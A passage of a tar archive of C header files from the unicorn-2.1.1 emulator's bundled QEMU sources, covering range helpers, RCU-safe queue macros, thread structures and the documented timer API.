empty, i.e. @lob must be less than or * equal @upb. */ static inline void range_set_bounds(Range *range, uint64_t lob, uint64_t upb) { range->lob = lob; range->upb = upb; assert(!range_is_empty(range)); } /* * Initialize @range to span the interval [@lob,@upb_plus1). * The lower bound is inclusive, the upper bound is exclusive. * Zero @upb_plus1 is special: if @lob is also zero, set @range to the * empty range. Else, set @range to [@lob,UINT64_MAX]. */ static inline void range_set_bounds1(Range *range, uint64_t lob, uint64_t upb_plus1) { if (!lob && !upb_plus1) { *range = range_empty; } else { range->lob = lob; range->upb = upb_plus1 - 1; } range_invariant(range); } /* Return @range's lower bound. @range must not be empty. */ static inline uint64_t range_lob(Range *range) { assert(!range_is_empty(range)); return range->lob; } /* Return @range's upper bound. @range must not be empty. */ static inline uint64_t range_upb(Range *range) { assert(!range_is_empty(range)); return range->upb; } /* * Initialize @range to span the interval [@lob,@lob + @size - 1]. * @size may be 0. If the range would overflow, returns -ERANGE, otherwise * 0. */ static inline int QEMU_WARN_UNUSED_RESULT range_init(Range *range, uint64_t lob, uint64_t size) { if (lob + size < lob) { return -ERANGE; } range->lob = lob; range->upb = lob + size - 1; range_invariant(range); return 0; } /* * Initialize @range to span the interval [@lob,@lob + @size - 1]. * @size may be 0. Range must not overflow. */ static inline void range_init_nofail(Range *range, uint64_t lob, uint64_t size) { range->lob = lob; range->upb = lob + size - 1; range_invariant(range); } /* * Get the size of @range. */ static inline uint64_t range_size(const Range *range) { return range->upb - range->lob + 1; } /* * Check if @range1 overlaps with @range2. If one of the ranges is empty, * the result is always "false". */ static inline bool range_overlaps_range(const Range *range1, const Range *range2) { if (range_is_empty(range1) || range_is_empty(range2)) { return false; } return !(range2->upb < range1->lob || range1->upb < range2->lob); } /* * Check if @range1 contains @range2. If one of the ranges is empty, * the result is always "false". */ static inline bool range_contains_range(const Range *range1, const Range *range2) { if (range_is_empty(range1) || range_is_empty(range2)) { return false; } return range1->lob <= range2->lob && range1->upb >= range2->upb; } /* * Extend @range to the smallest interval that includes @extend_by, too. */ static inline void range_extend(Range *range, Range *extend_by) { if (range_is_empty(extend_by)) { return; } if (range_is_empty(range)) { *range = *extend_by; return; } if (range->lob > extend_by->lob) { range->lob = extend_by->lob; } if (range->upb < extend_by->upb) { range->upb = extend_by->upb; } range_invariant(range); } /* Get last byte of a range from offset + length. * Undefined for ranges that wrap around 0. */ static inline uint64_t range_get_last(uint64_t offset, uint64_t len) { return offset + len - 1; } /* Check whether a given range covers a given byte. */ static inline int range_covers_byte(uint64_t offset, uint64_t len, uint64_t byte) { return offset <= byte && byte <= range_get_last(offset, len); } /* Check whether 2 given ranges overlap. * Undefined if ranges that wrap around 0. */ static inline int ranges_overlap(uint64_t first1, uint64_t len1, uint64_t first2, uint64_t len2) { uint64_t last1 = range_get_last(first1, len1); uint64_t last2 = range_get_last(first2, len2); return !(last2 < first1 || last1 < first2); } GList *range_list_insert(GList *list, Range *data); #endif unicorn-2.1.1/qemu/include/qemu/rcu_queue.h���������������������������������������������������������0000664�0000000�0000000�00000030603�14675241067�0020715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_RCU_QUEUE_H #define QEMU_RCU_QUEUE_H /* * rcu_queue.h * * RCU-friendly versions of the queue.h primitives. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA * * Copyright (c) 2013 Mike D. Day, IBM Corporation. * * IBM's contributions to this file may be relicensed under LGPLv2 or later. */ #include "qemu/queue.h" #include "qemu/atomic.h" #ifdef __cplusplus extern "C" { #endif /* * List access methods. */ #define QLIST_EMPTY_RCU(head) (atomic_read(&(head)->lh_first) == NULL) #define QLIST_FIRST_RCU(head) (atomic_rcu_read(&(head)->lh_first)) #define QLIST_NEXT_RCU(elm, field) (atomic_rcu_read(&(elm)->field.le_next)) /* * List functions. */ /* * The difference between atomic_read/set and atomic_rcu_read/set * is in the including of a read/write memory barrier to the volatile * access. atomic_rcu_* macros include the memory barrier, the * plain atomic macros do not. Therefore, it should be correct to * issue a series of reads or writes to the same element using only * the atomic_* macro, until the last read or write, which should be * atomic_rcu_* to introduce a read or write memory barrier as * appropriate. */ /* Upon publication of the listelm->next value, list readers * will see the new node when following next pointers from * antecedent nodes, but may not see the new node when following * prev pointers from subsequent nodes until after the RCU grace * period expires. * see linux/include/rculist.h __list_add_rcu(new, prev, next) */ #define QLIST_INSERT_AFTER_RCU(listelm, elm, field) do { \ (elm)->field.le_next = (listelm)->field.le_next; \ (elm)->field.le_prev = &(listelm)->field.le_next; \ atomic_rcu_set(&(listelm)->field.le_next, (elm)); \ if ((elm)->field.le_next != NULL) { \ (elm)->field.le_next->field.le_prev = \ &(elm)->field.le_next; \ } \ } while (/*CONSTCOND*/0) /* Upon publication of the listelm->prev->next value, list * readers will see the new element when following prev pointers * from subsequent elements, but may not see the new element * when following next pointers from antecedent elements * until after the RCU grace period expires. */ #define QLIST_INSERT_BEFORE_RCU(listelm, elm, field) do { \ (elm)->field.le_prev = (listelm)->field.le_prev; \ (elm)->field.le_next = (listelm); \ atomic_rcu_set((listelm)->field.le_prev, (elm)); \ (listelm)->field.le_prev = &(elm)->field.le_next; \ } while (/*CONSTCOND*/0) /* Upon publication of the head->first value, list readers * will see the new element when following the head, but may * not see the new element when following prev pointers from * subsequent elements until after the RCU grace period has * expired. */ #define QLIST_INSERT_HEAD_RCU(head, elm, field) do { \ (elm)->field.le_prev = &(head)->lh_first; \ (elm)->field.le_next = (head)->lh_first; \ atomic_rcu_set((&(head)->lh_first), (elm)); \ if ((elm)->field.le_next != NULL) { \ (elm)->field.le_next->field.le_prev = \ &(elm)->field.le_next; \ } \ } while (/*CONSTCOND*/0) /* prior to publication of the elm->prev->next value, some list * readers may still see the removed element when following * the antecedent's next pointer. */ #define QLIST_REMOVE_RCU(elm, field) do { \ if ((elm)->field.le_next != NULL) { \ (elm)->field.le_next->field.le_prev = \ (elm)->field.le_prev; \ } \ atomic_set((elm)->field.le_prev, (elm)->field.le_next); \ } while (/*CONSTCOND*/0) /* List traversal must occur within an RCU critical section. */ #define QLIST_FOREACH_RCU(var, head, field) \ for ((var) = atomic_rcu_read(&(head)->lh_first); \ (var); \ (var) = atomic_rcu_read(&(var)->field.le_next)) /* List traversal must occur within an RCU critical section. */ #define QLIST_FOREACH_SAFE_RCU(var, head, field, next_var) \ for ((var) = (atomic_rcu_read(&(head)->lh_first)); \ (var) && \ ((next_var) = atomic_rcu_read(&(var)->field.le_next), 1); \ (var) = (next_var)) /* * RCU simple queue */ /* Simple queue access methods */ #define QSIMPLEQ_EMPTY_RCU(head) (atomic_read(&(head)->sqh_first) == NULL) #define QSIMPLEQ_FIRST_RCU(head) atomic_rcu_read(&(head)->sqh_first) #define QSIMPLEQ_NEXT_RCU(elm, field) atomic_rcu_read(&(elm)->field.sqe_next) /* Simple queue functions */ #define QSIMPLEQ_INSERT_HEAD_RCU(head, elm, field) do { \ (elm)->field.sqe_next = (head)->sqh_first; \ if ((elm)->field.sqe_next == NULL) { \ (head)->sqh_last = &(elm)->field.sqe_next; \ } \ atomic_rcu_set(&(head)->sqh_first, (elm)); \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_INSERT_TAIL_RCU(head, elm, field) do { \ (elm)->field.sqe_next = NULL; \ atomic_rcu_set((head)->sqh_last, (elm)); \ (head)->sqh_last = &(elm)->field.sqe_next; \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_INSERT_AFTER_RCU(head, listelm, elm, field) do { \ (elm)->field.sqe_next = (listelm)->field.sqe_next; \ if ((elm)->field.sqe_next == NULL) { \ (head)->sqh_last = &(elm)->field.sqe_next; \ } \ atomic_rcu_set(&(listelm)->field.sqe_next, (elm)); \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_REMOVE_HEAD_RCU(head, field) do { \ atomic_set(&(head)->sqh_first, (head)->sqh_first->field.sqe_next); \ if ((head)->sqh_first == NULL) { \ (head)->sqh_last = &(head)->sqh_first; \ } \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_REMOVE_RCU(head, elm, type, field) do { \ if ((head)->sqh_first == (elm)) { \ QSIMPLEQ_REMOVE_HEAD_RCU((head), field); \ } else { \ struct type *curr = (head)->sqh_first; \ while (curr->field.sqe_next != (elm)) { \ curr = curr->field.sqe_next; \ } \ atomic_set(&curr->field.sqe_next, \ curr->field.sqe_next->field.sqe_next); \ if (curr->field.sqe_next == NULL) { \ (head)->sqh_last = &(curr)->field.sqe_next; \ } \ } \ } while (/*CONSTCOND*/0) #define QSIMPLEQ_FOREACH_RCU(var, head, field) \ for ((var) = atomic_rcu_read(&(head)->sqh_first); \ (var); \ (var) = atomic_rcu_read(&(var)->field.sqe_next)) #define QSIMPLEQ_FOREACH_SAFE_RCU(var, head, field, next) \ for ((var) = atomic_rcu_read(&(head)->sqh_first); \ (var) && ((next) = atomic_rcu_read(&(var)->field.sqe_next), 1); \ (var) = (next)) /* * RCU tail queue */ /* Tail queue access methods */ #define QTAILQ_EMPTY_RCU(head) (atomic_read(&(head)->tqh_first) == NULL) #define QTAILQ_FIRST_RCU(head) atomic_rcu_read(&(head)->tqh_first) #define QTAILQ_NEXT_RCU(elm, field) atomic_rcu_read(&(elm)->field.tqe_next) /* Tail queue functions */ #define QTAILQ_INSERT_HEAD_RCU(head, elm, field) do { \ (elm)->field.tqe_next = (head)->tqh_first; \ if ((elm)->field.tqe_next != NULL) { \ (head)->tqh_first->field.tqe_circ.tql_prev = \ &(elm)->field.tqe_circ; \ } else { \ (head)->tqh_circ.tql_prev = &(elm)->field.tqe_circ; \ } \ atomic_rcu_set(&(head)->tqh_first, (elm)); \ (elm)->field.tqe_circ.tql_prev = &(head)->tqh_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_INSERT_TAIL_RCU(head, elm, field) do { \ (elm)->field.tqe_next = NULL; \ (elm)->field.tqe_circ.tql_prev = (head)->tqh_circ.tql_prev; \ atomic_rcu_set(&(head)->tqh_circ.tql_prev->tql_next, (elm)); \ (head)->tqh_circ.tql_prev = &(elm)->field.tqe_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_INSERT_AFTER_RCU(head, listelm, elm, field) do { \ (elm)->field.tqe_next = (listelm)->field.tqe_next; \ if ((elm)->field.tqe_next != NULL) { \ (elm)->field.tqe_next->field.tqe_circ.tql_prev = \ &(elm)->field.tqe_circ; \ } else { \ (head)->tqh_circ.tql_prev = &(elm)->field.tqe_circ; \ } \ atomic_rcu_set(&(listelm)->field.tqe_next, (elm)); \ (elm)->field.tqe_circ.tql_prev = &(listelm)->field.tqe_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_INSERT_BEFORE_RCU(listelm, elm, field) do { \ (elm)->field.tqe_circ.tql_prev = (listelm)->field.tqe_circ.tql_prev; \ (elm)->field.tqe_next = (listelm); \ atomic_rcu_set(&(listelm)->field.tqe_circ.tql_prev->tql_next, (elm)); \ (listelm)->field.tqe_circ.tql_prev = &(elm)->field.tqe_circ; \ } while (/*CONSTCOND*/0) #define QTAILQ_REMOVE_RCU(head, elm, field) do { \ if (((elm)->field.tqe_next) != NULL) { \ (elm)->field.tqe_next->field.tqe_circ.tql_prev = \ (elm)->field.tqe_circ.tql_prev; \ } else { \ (head)->tqh_circ.tql_prev = (elm)->field.tqe_circ.tql_prev; \ } \ atomic_set(&(elm)->field.tqe_circ.tql_prev->tql_next, (elm)->field.tqe_next); \ (elm)->field.tqe_circ.tql_prev = NULL; \ } while (/*CONSTCOND*/0) #define QTAILQ_FOREACH_RCU(var, head, field) \ for ((var) = atomic_rcu_read(&(head)->tqh_first); \ (var); \ (var) = atomic_rcu_read(&(var)->field.tqe_next)) #define QTAILQ_FOREACH_SAFE_RCU(var, head, field, next) \ for ((var) = atomic_rcu_read(&(head)->tqh_first); \ (var) && ((next) = atomic_rcu_read(&(var)->field.tqe_next), 1); \ (var) = (next)) #ifdef __cplusplus } #endif #endif /* QEMU_RCU_QUEUE_H */ �����������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/thread-posix.h������������������������������������������������������0000664�0000000�0000000�00000000233�14675241067�0021323�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_THREAD_POSIX_H #define QEMU_THREAD_POSIX_H #include <pthread.h> #include <semaphore.h> struct QemuThread { pthread_t thread; }; #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/thread-win32.h������������������������������������������������������0000664�0000000�0000000�00000000453�14675241067�0021127�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_THREAD_WIN32_H #define QEMU_THREAD_WIN32_H #include <windows.h> typedef struct QemuThreadData QemuThreadData; struct QemuThread { QemuThreadData *data; unsigned tid; }; /* Only valid for joinable threads. */ HANDLE qemu_thread_get_handle(struct QemuThread *thread); #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/thread.h������������������������������������������������������������0000664�0000000�0000000�00000001201�14675241067�0020157�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_THREAD_H #define QEMU_THREAD_H #include "unicorn/platform.h" #include "qemu/processor.h" struct uc_struct; typedef struct QemuThread QemuThread; #if defined(_WIN32) && !defined(__MINGW32__) #include "qemu/thread-win32.h" #else #include "qemu/thread-posix.h" #endif #define QEMU_THREAD_JOINABLE 0 #define QEMU_THREAD_DETACHED 1 int qemu_thread_create(struct uc_struct *uc, QemuThread *thread, const char *name, void *(*start_routine)(void *), void *arg, int mode); void *qemu_thread_join(QemuThread *thread); void qemu_thread_exit(struct uc_struct *uc, void *retval); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/timer.h�������������������������������������������������������������0000664�0000000�0000000�00000065644�14675241067�0020055�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_TIMER_H #define QEMU_TIMER_H #include "qemu/bitops.h" #include "qemu/host-utils.h" #define NANOSECONDS_PER_SECOND 1000000000LL /* timers */ #define SCALE_MS 1000000 #define SCALE_US 1000 #define SCALE_NS 1 /** * QEMUClockType: * * The following clock types are available: * * @QEMU_CLOCK_REALTIME: Real time clock * * The real time clock should be used only for stuff which does not * change the virtual machine state, as it runs even if the virtual * machine is stopped. * * @QEMU_CLOCK_VIRTUAL: virtual clock * * The virtual clock only runs during the emulation. It stops * when the virtual machine is stopped. * * @QEMU_CLOCK_HOST: host clock * * The host clock should be used for device models that emulate accurate * real time sources. It will continue to run when the virtual machine * is suspended, and it will reflect system time changes the host may * undergo (e.g. due to NTP). * * @QEMU_CLOCK_VIRTUAL_RT: realtime clock used for icount warp * * Outside icount mode, this clock is the same as @QEMU_CLOCK_VIRTUAL. * In icount mode, this clock counts nanoseconds while the virtual * machine is running. It is used to increase @QEMU_CLOCK_VIRTUAL * while the CPUs are sleeping and thus not executing instructions. */ typedef enum { QEMU_CLOCK_REALTIME = 0, QEMU_CLOCK_VIRTUAL = 1, QEMU_CLOCK_HOST = 2, QEMU_CLOCK_VIRTUAL_RT = 3, QEMU_CLOCK_MAX } QEMUClockType; /** * QEMU Timer attributes: * * An individual timer may be given one or multiple attributes when initialized. * Each attribute corresponds to one bit. Attributes modify the processing * of timers when they fire. * * The following attributes are available: * * QEMU_TIMER_ATTR_EXTERNAL: drives external subsystem * QEMU_TIMER_ATTR_ALL: mask for all existing attributes * * Timers with this attribute do not recorded in rr mode, therefore it could be * used for the subsystems that operate outside the guest core. Applicable only * with virtual clock type. */ #define QEMU_TIMER_ATTR_EXTERNAL ((int)BIT(0)) #define QEMU_TIMER_ATTR_ALL 0xffffffff typedef struct QEMUTimerList QEMUTimerList; struct QEMUTimerListGroup { QEMUTimerList *tl[QEMU_CLOCK_MAX]; }; typedef void QEMUTimerCB(void *opaque); typedef void QEMUTimerListNotifyCB(void *opaque, QEMUClockType type); struct QEMUTimer { int64_t expire_time; /* in nanoseconds */ QEMUTimerList *timer_list; QEMUTimerCB *cb; void *opaque; QEMUTimer *next; int attributes; int scale; }; /* * qemu_clock_get_ns; * @type: the clock type * * Get the nanosecond value of a clock with * type @type * * Returns: the clock value in nanoseconds */ int64_t qemu_clock_get_ns(QEMUClockType type); /** * qemu_clock_get_ms; * @type: the clock type * * Get the millisecond value of a clock with * type @type * * Returns: the clock value in milliseconds */ static inline int64_t qemu_clock_get_ms(QEMUClockType type) { return qemu_clock_get_ns(type) / SCALE_MS; } /** * qemu_clock_get_us; * @type: the clock type * * Get the microsecond value of a clock with * type @type * * Returns: the clock value in microseconds */ static inline int64_t qemu_clock_get_us(QEMUClockType type) { return qemu_clock_get_ns(type) / SCALE_US; } /** * qemu_clock_has_timers: * @type: the clock type * * Determines whether a clock's default timer list * has timers attached * * Note that this function should not be used when other threads also access * the timer list. The return value may be outdated by the time it is acted * upon. * * Returns: true if the clock's default timer list * has timers attached */ bool qemu_clock_has_timers(QEMUClockType type); /** * qemu_clock_expired: * @type: the clock type * * Determines whether a clock's default timer list * has an expired timer. * * Returns: true if the clock's default timer list has * an expired timer */ bool qemu_clock_expired(QEMUClockType type); /** * qemu_clock_use_for_deadline: * @type: the clock type * * Determine whether a clock should be used for deadline * calculations. Some clocks, for instance vm_clock with * use_icount set, do not count in nanoseconds. Such clocks * are not used for deadline calculations, and are presumed * to interrupt any poll using qemu_notify/aio_notify * etc. * * Returns: true if the clock runs in nanoseconds and * should be used for a deadline. */ bool qemu_clock_use_for_deadline(QEMUClockType type); /** * qemu_clock_deadline_ns_all: * @type: the clock type * @attr_mask: mask for the timer attributes that are included * in deadline calculation * * Calculate the deadline across all timer lists associated * with a clock (as opposed to just the default one) * in nanoseconds, or -1 if no timer is set to expire. * * Returns: time until expiry in nanoseconds or -1 */ int64_t qemu_clock_deadline_ns_all(QEMUClockType type, int attr_mask); /** * qemu_clock_get_main_loop_timerlist: * @type: the clock type * * Return the default timer list associated with a clock. * * Returns: the default timer list */ QEMUTimerList *qemu_clock_get_main_loop_timerlist(QEMUClockType type); /** * qemu_clock_nofify: * @type: the clock type * * Call the notifier callback connected with the default timer * list linked to the clock, or qemu_notify() if none. */ void qemu_clock_notify(QEMUClockType type); /** * qemu_clock_enable: * @type: the clock type * @enabled: true to enable, false to disable * * Enable or disable a clock * Disabling the clock will wait for related timerlists to stop * executing qemu_run_timers. Thus, this functions should not * be used from the callback of a timer that is based on @clock. * Doing so would cause a deadlock. * * Caller should hold BQL. */ void qemu_clock_enable(QEMUClockType type, bool enabled); /** * qemu_start_warp_timer: * * Starts a timer for virtual clock update */ void qemu_start_warp_timer(void); /** * qemu_clock_run_timers: * @type: clock on which to operate * * Run all the timers associated with the default timer list * of a clock. * * Returns: true if any timer ran. */ bool qemu_clock_run_timers(QEMUClockType type); /** * qemu_clock_run_all_timers: * * Run all the timers associated with the default timer list * of every clock. * * Returns: true if any timer ran. */ bool qemu_clock_run_all_timers(void); /* * QEMUTimerList */ /** * timerlist_new: * @type: the clock type to associate with the timerlist * @cb: the callback to call on notification * @opaque: the opaque pointer to pass to the callback * * Create a new timerlist associated with the clock of * type @type. * * Returns: a pointer to the QEMUTimerList created */ QEMUTimerList *timerlist_new(QEMUClockType type, QEMUTimerListNotifyCB *cb, void *opaque); /** * timerlist_free: * @timer_list: the timer list to free * * Frees a timer_list. It must have no active timers. */ void timerlist_free(QEMUTimerList *timer_list); /** * timerlist_has_timers: * @timer_list: the timer list to operate on * * Determine whether a timer list has active timers * * Note that this function should not be used when other threads also access * the timer list. The return value may be outdated by the time it is acted * upon. * * Returns: true if the timer list has timers. */ bool timerlist_has_timers(QEMUTimerList *timer_list); /** * timerlist_expired: * @timer_list: the timer list to operate on * * Determine whether a timer list has any timers which * are expired. * * Returns: true if the timer list has timers which * have expired. */ bool timerlist_expired(QEMUTimerList *timer_list); /** * timerlist_deadline_ns: * @timer_list: the timer list to operate on * * Determine the deadline for a timer_list, i.e. * the number of nanoseconds until the first timer * expires. Return -1 if there are no timers. * * Returns: the number of nanoseconds until the earliest * timer expires -1 if none */ int64_t timerlist_deadline_ns(QEMUTimerList *timer_list); /** * timerlist_get_clock: * @timer_list: the timer list to operate on * * Determine the clock type associated with a timer list. * * Returns: the clock type associated with the * timer list. */ QEMUClockType timerlist_get_clock(QEMUTimerList *timer_list); /** * timerlist_run_timers: * @timer_list: the timer list to use * * Call all expired timers associated with the timer list. * * Returns: true if any timer expired */ bool timerlist_run_timers(QEMUTimerList *timer_list); /** * timerlist_notify: * @timer_list: the timer list to use * * call the notifier callback associated with the timer list. */ void timerlist_notify(QEMUTimerList *timer_list); /* * QEMUTimerListGroup */ /** * timerlistgroup_init: * @tlg: the timer list group * @cb: the callback to call when a notify is required * @opaque: the opaque pointer to be passed to the callback. * * Initialise a timer list group. This must already be * allocated in memory and zeroed. The notifier callback is * called whenever a clock in the timer list group is * reenabled or whenever a timer associated with any timer * list is modified. If @cb is specified as null, qemu_notify() * is used instead. */ void timerlistgroup_init(QEMUTimerListGroup *tlg, QEMUTimerListNotifyCB *cb, void *opaque); /** * timerlistgroup_deinit: * @tlg: the timer list group * * Deinitialise a timer list group. This must already be * initialised. Note the memory is not freed. */ void timerlistgroup_deinit(QEMUTimerListGroup *tlg); /** * timerlistgroup_run_timers: * @tlg: the timer list group * * Run the timers associated with a timer list group. * This will run timers on multiple clocks. * * Returns: true if any timer callback ran */ bool timerlistgroup_run_timers(QEMUTimerListGroup *tlg); /** * timerlistgroup_deadline_ns: * @tlg: the timer list group * * Determine the deadline of the soonest timer to * expire associated with any timer list linked to * the timer list group. Only clocks suitable for * deadline calculation are included. * * Returns: the deadline in nanoseconds or -1 if no * timers are to expire. */ int64_t timerlistgroup_deadline_ns(QEMUTimerListGroup *tlg); /* * QEMUTimer */ /** * timer_init_full: * @ts: the timer to be initialised * @timer_list_group: (optional) the timer list group to attach the timer to * @type: the clock type to use * @scale: the scale value for the timer * @attributes: 0, or one or more OR'ed QEMU_TIMER_ATTR_<id> values * @cb: the callback to be called when the timer expires * @opaque: the opaque pointer to be passed to the callback * * Initialise a timer with the given scale and attributes, * and associate it with timer list for given clock @type in @timer_list_group * (or default timer list group, if NULL). * The caller is responsible for allocating the memory. * * You need not call an explicit deinit call. Simply make * sure it is not on a list with timer_del. */ void timer_init_full(QEMUTimer *ts, QEMUTimerListGroup *timer_list_group, QEMUClockType type, int scale, int attributes, QEMUTimerCB *cb, void *opaque); /** * timer_init: * @ts: the timer to be initialised * @type: the clock to associate with the timer * @scale: the scale value for the timer * @cb: the callback to call when the timer expires * @opaque: the opaque pointer to pass to the callback * * Initialize a timer with the given scale on the default timer list * associated with the clock. * See timer_init_full for details. */ static inline void timer_init(QEMUTimer *ts, QEMUClockType type, int scale, QEMUTimerCB *cb, void *opaque) { // timer_init_full(ts, NULL, type, scale, 0, cb, opaque); } /** * timer_init_ns: * @ts: the timer to be initialised * @type: the clock to associate with the timer * @cb: the callback to call when the timer expires * @opaque: the opaque pointer to pass to the callback * * Initialize a timer with nanosecond scale on the default timer list * associated with the clock. * See timer_init_full for details. */ static inline void timer_init_ns(QEMUTimer *ts, QEMUClockType type, QEMUTimerCB *cb, void *opaque) { timer_init(ts, type, SCALE_NS, cb, opaque); } /** * timer_init_us: * @ts: the timer to be initialised * @type: the clock to associate with the timer * @cb: the callback to call when the timer expires * @opaque: the opaque pointer to pass to the callback * * Initialize a timer with microsecond scale on the default timer list * associated with the clock. * See timer_init_full for details. */ static inline void timer_init_us(QEMUTimer *ts, QEMUClockType type, QEMUTimerCB *cb, void *opaque) { timer_init(ts, type, SCALE_US, cb, opaque); } /** * timer_init_ms: * @ts: the timer to be initialised * @type: the clock to associate with the timer * @cb: the callback to call when the timer expires * @opaque: the opaque pointer to pass to the callback * * Initialize a timer with millisecond scale on the default timer list * associated with the clock. * See timer_init_full for details. */ static inline void timer_init_ms(QEMUTimer *ts, QEMUClockType type, QEMUTimerCB *cb, void *opaque) { timer_init(ts, type, SCALE_MS, cb, opaque); } /** * timer_new_full: * @timer_list_group: (optional) the timer list group to attach the timer to * @type: the clock type to use * @scale: the scale value for the timer * @attributes: 0, or one or more OR'ed QEMU_TIMER_ATTR_<id> values * @cb: the callback to be called when the timer expires * @opaque: the opaque pointer to be passed to the callback * * Create a new timer with the given scale and attributes, * and associate it with timer list for given clock @type in @timer_list_group * (or default timer list group, if NULL). * The memory is allocated by the function. * * This is not the preferred interface unless you know you * are going to call timer_free. Use timer_init or timer_init_full instead. * * The default timer list has one special feature: in icount mode, * %QEMU_CLOCK_VIRTUAL timers are run in the vCPU thread. This is * not true of other timer lists, which are typically associated * with an AioContext---each of them runs its timer callbacks in its own * AioContext thread. * * Returns: a pointer to the timer */ static inline QEMUTimer *timer_new_full(QEMUTimerListGroup *timer_list_group, QEMUClockType type, int scale, int attributes, QEMUTimerCB *cb, void *opaque) { QEMUTimer *ts = g_malloc0(sizeof(QEMUTimer)); // timer_init_full(ts, timer_list_group, type, scale, attributes, cb, opaque); return ts; } /** * timer_new: * @type: the clock type to use * @scale: the scale value for the timer * @cb: the callback to be called when the timer expires * @opaque: the opaque pointer to be passed to the callback * * Create a new timer with the given scale, * and associate it with the default timer list for the clock type @type. * See timer_new_full for details. * * Returns: a pointer to the timer */ static inline QEMUTimer *timer_new(QEMUClockType type, int scale, QEMUTimerCB *cb, void *opaque) { return timer_new_full(NULL, type, scale, 0, cb, opaque); } /** * timer_new_ns: * @type: the clock type to associate with the timer * @cb: the callback to call when the timer expires * @opaque: the opaque pointer to pass to the callback * * Create a new timer with nanosecond scale on the default timer list * associated with the clock. * See timer_new_full for details. * * Returns: a pointer to the newly created timer */ static inline QEMUTimer *timer_new_ns(QEMUClockType type, QEMUTimerCB *cb, void *opaque) { return timer_new(type, SCALE_NS, cb, opaque); } /** * timer_new_us: * @type: the clock type to associate with the timer * @cb: the callback to call when the timer expires * @opaque: the opaque pointer to pass to the callback * * Create a new timer with microsecond scale on the default timer list * associated with the clock. * See timer_new_full for details. * * Returns: a pointer to the newly created timer */ static inline QEMUTimer *timer_new_us(QEMUClockType type, QEMUTimerCB *cb, void *opaque) { return timer_new(type, SCALE_US, cb, opaque); } /** * timer_new_ms: * @type: the clock type to associate with the timer * @cb: the callback to call when the timer expires * @opaque: the opaque pointer to pass to the callback * * Create a new timer with millisecond scale on the default timer list * associated with the clock. * See timer_new_full for details. * * Returns: a pointer to the newly created timer */ static inline QEMUTimer *timer_new_ms(QEMUClockType type, QEMUTimerCB *cb, void *opaque) { return timer_new(type, SCALE_MS, cb, opaque); } /** * timer_deinit: * @ts: the timer to be de-initialised * * Deassociate the timer from any timerlist. You should * call timer_del before. After this call, any further * timer_del call cannot cause dangling pointer accesses * even if the previously used timerlist is freed. */ void timer_deinit(QEMUTimer *ts); /** * timer_free: * @ts: the timer * * Free a timer (it must not be on the active list) */ static inline void timer_free(QEMUTimer *ts) { g_free(ts); } /** * timer_del: * @ts: the timer * * Delete a timer from the active list. * * This function is thread-safe but the timer and its timer list must not be * freed while this function is running. */ void timer_del(QEMUTimer *ts); /** * timer_mod_ns: * @ts: the timer * @expire_time: the expiry time in nanoseconds * * Modify a timer to expire at @expire_time * * This function is thread-safe but the timer and its timer list must not be * freed while this function is running. */ void timer_mod_ns(QEMUTimer *ts, int64_t expire_time); /** * timer_mod_anticipate_ns: * @ts: the timer * @expire_time: the expiry time in nanoseconds * * Modify a timer to expire at @expire_time or the current time, * whichever comes earlier. * * This function is thread-safe but the timer and its timer list must not be * freed while this function is running. */ void timer_mod_anticipate_ns(QEMUTimer *ts, int64_t expire_time); /** * timer_mod: * @ts: the timer * @expire_time: the expire time in the units associated with the timer * * Modify a timer to expiry at @expire_time, taking into * account the scale associated with the timer. * * This function is thread-safe but the timer and its timer list must not be * freed while this function is running. */ void timer_mod(QEMUTimer *ts, int64_t expire_timer); /** * timer_mod_anticipate: * @ts: the timer * @expire_time: the expiry time in nanoseconds * * Modify a timer to expire at @expire_time or the current time, whichever * comes earlier, taking into account the scale associated with the timer. * * This function is thread-safe but the timer and its timer list must not be * freed while this function is running. */ void timer_mod_anticipate(QEMUTimer *ts, int64_t expire_time); /** * timer_pending: * @ts: the timer * * Determines whether a timer is pending (i.e. is on the * active list of timers, whether or not it has not yet expired). * * Returns: true if the timer is pending */ bool timer_pending(QEMUTimer *ts); /** * timer_expired: * @ts: the timer * @current_time: the current time * * Determines whether a timer has expired. * * Returns: true if the timer has expired */ bool timer_expired(QEMUTimer *timer_head, int64_t current_time); /** * timer_expire_time_ns: * @ts: the timer * * Determine the expiry time of a timer * * Returns: the expiry time in nanoseconds */ uint64_t timer_expire_time_ns(QEMUTimer *ts); /* * General utility functions */ /** * qemu_timeout_ns_to_ms: * @ns: nanosecond timeout value * * Convert 